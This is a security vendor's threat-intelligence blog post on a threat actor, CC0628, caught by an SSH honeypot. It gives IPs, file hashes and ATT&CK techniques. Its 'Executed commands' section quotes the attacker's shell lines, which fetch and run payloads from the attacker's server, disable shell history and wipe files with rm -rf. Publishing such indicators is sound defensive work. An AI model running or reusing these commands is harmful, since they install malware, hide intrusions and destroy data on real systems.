Blog  

New Threat Actor Alert: CC0628

New Threat Actor Alert: CC0628

Over the past year, our team has been working at gathering intel on new and unusual threat actors to augment the capabilities of our platform. Using our deception technology, we have detected several new threat actors in the wild, some of which we will be sharing weekly, right here. This is the first in a series of posts in which we will describe the IOCs and TTPs of different threat actors we have uncovered, so be sure to check back or follow us on LinkedIn for updates.

By locating a decoy machine in a U.S. web server of a well-known provider, with an ssh port open to the outside network, we have found many attackers that approach the machine and try to access it, oftentimes with sheer brute force. By giving the machine a deliberately weak username and password, we were able to allow attackers an easy way in, after which we could observe their behaviors and TTPs. This relevant and timely threat intelligence allows us to update threat actor intel for our platform, so that all of our clients can benefit from the knowledge. This information can also be shared with red and blue teams so they know what malwares and attackers are compromising machines.

Read on about the first of many threat actors we’re tracking: CC0628.

CC0628
Suspected attribution: Unknown
Risk: Medium
Target sectors: Any host.
Overview: The goal of CC0628 is to scan the Internet searching for vulnerabilities using a compromised machine to not be reported.
Associated malware: SSHD, MIZAKOTROPISTA86, MIZAKOTROPISTAPS, MIZAKOTROPISTSL, MIZAKOTROPISTAM4, MIZAKOTROPISTAM5, MIZAKOTROPISTAM6, MIZAKOTROPISTAM7, MIZAKOTROPISTAPC, MIZAKOTROPISTA8K, MIZAKOTROPISTAX64 CRATON.PL, ULIMIT.SH

IOCs:

IP
192.99.43.212
144.217.249.55

FilenameFilepathSHA-256
sshd/tmp/sshd97e86c34cd0b678e12edcabf40b16e6c274815f591905eb9e6ec2c97ab9b5f58
mizakotropista86/tmp/mizakotropista8650fa1f2735f018b22c86fc6ce546a8c6b9ca730e78d23f5a986f787191398c37
mizakotropistaps/tmp/mizakotropistaps0619b86b6707c97febaae11d75f783ec4b32e88f83f5d55761a0d04f92bea42e
mizakotropistasl/tmp/mizakotropistasl0e722a9c17bebf1a84754e4cef108a38cde9763749596d5a4672697ab68eaf67
mizakotropistam4/tmp/mizakotropistam45b1ca59a8e0e9583c4102605264fc29a0cfab84c68b78072a908a5783b441948
mizakotropistam5/tmp/mizakotropistam5110ddecda3ce0bd41206fe557550754b4fb21bcd663201253d57f9c291764440
mizakotropistam6/tmp/mizakotropistam6447e208fa47057567e828912b23a0927b0c74220e7336e2243ff1541b353157e
mizakotropistam7/tmp/mizakotropistam7f89bb5668bb6b8c46e837e8219e07303b94305bae6faa298ea21feea2b02cd3d
mizakotropistapc/tmp/mizakotropistapce762e34fb86167d139a61ecbcc6dfb768ee4cfb7955469ff9fda6e444a60af75
mizakotropista8k/tmp/mizakotropista8k3c128d01635bf9a9b5d3d90ef4a56212554f7a44c579a74aff707455847eb515
mizakotropistax64/tmp/mizakotropistax645d6f674a7abab5e60548531a69e6ecb23cc2e2fe823cd7f8ccac6928db5f757e
bash.sh/tmp/bash.sha5e010b0abf603facae5676c2c37f7063f6efc12bc7c863982bff133ec547a3f
craton.pl/tmp/craton.pl7046260a23088b52debdeb701032db0352323ed26d9816daa4a53222b26ca720

Attack vectors:

CC0628 uses brute force attacks as its initial compromise method.

Once they obtain a valid authentication, they download and execute a script called sshd where they start downloading and executing different files such as MELITACAFE, MIZAKOTROPISTA86 and CRATON.PL. All these files have the same content but are compiled for different systems.

Finally, they started scanning the Internet for vulnerabilities and they sent all scanned IPs to their server.

MITRE ATT&CK Techniques

Cataloguing the threat actor’s TTPs with MITRE ATT&CK’s matrix can help teams mitigate risk and stop attacks. These are the MITRE ATT&CK techniques that we observed in CC0628’s behavior:

MITRE ATT&CK PIC WITH MATCHED TTPs


Command and Scripting Interpreter - Unix Shell (T1059.004): attackers abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh…) depending on the specific distribution.

Network Service Scanning (T1046): attackers attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.

Indicator Removal on Host - File Deletion (T1070.004): attackers delete files left behind by the actions of their intrusion activity. Malware, tools. Or other non-native files dropped or created on a system by an adversary may leave traces to indicate what was done within a network and how.

Executed commands:


wget 192.99.43.212/sshd -O /tmp/sshd; curl -O 192.99.43.212/sshd -o /tmp/sshd; chmod 777 /tmp/sshd; sh /tmp/sshd; rm -rf /tmp/sshd /tmp/sshd.1; rm -rf *

rm -rf /tmp/mizakotropista*

rm -rf /tmp/melitacafe*

rm -rf mizakotropista*

rm -rf melitacafe*

unset HISTFILE; unset SAVEHIST

echo "unset HISTFILE; unset SAVEHIST" >> ~/.bashrc

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropista86; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropista86;cat mizakotropista86 >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistaps; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistaps;cat mizakotropistaps >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistasl; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistasl;cat mizakotropistasl >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam4; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam4;cat mizakotropistam4 >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam5; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam5;cat mizakotropistam5 >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam6; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam6;cat mizakotropistam6 >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam7; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam7;cat mizakotropistam7 >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistapc; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistapc;cat mizakotropistapc >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropista8k; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropista8k;cat mizakotropista8k >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistah4; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistah4;cat mizakotropistah4 >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistax64; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistax64;cat mizakotropistax64 >melitacafe;chmod +x *;nice -20 ./melitacafe machine

cd /tmp; wget http://192.99.43.212/bash.sh; curl http://192.99.43.212/bash.sh -o bash.sh; chmod 777 bash.sh; nohup bash bash.sh &

cd /tmp; wget http://192.99.43.212/craton.pl -O /tmp/craton.pl; curl http://192.99.43.212/craton.pl -o /tmp/craton.pl; chmod 777 /tmp/craton.pl; perl /tmp/craton.pl; rm -rf /tmp/craton.pl; rm -rf /tmp/craton.pl.*

cd /tmp; curl 144.217.249.55/initd -o /tmp/initd; wget 144.217.249.55/initd -O /tmp/initd; chmod 777 /tmp/initd; sh /tmp/initd; rm -rf /tmp/initd; rm -rf /tmp/initd.1

rm -rf /tmp/*

rm -rf /var/tmp/*

Follow these links to read about the other threat actors we’ve uncovered using our deception-powered threat intel:

CC0629

CC0630

CC0632

New Threat Actor Alert: CC0628
New, real-time threat intel on threat actors we’ve discovered

Like Jim Morrison said, this is the end. But you can...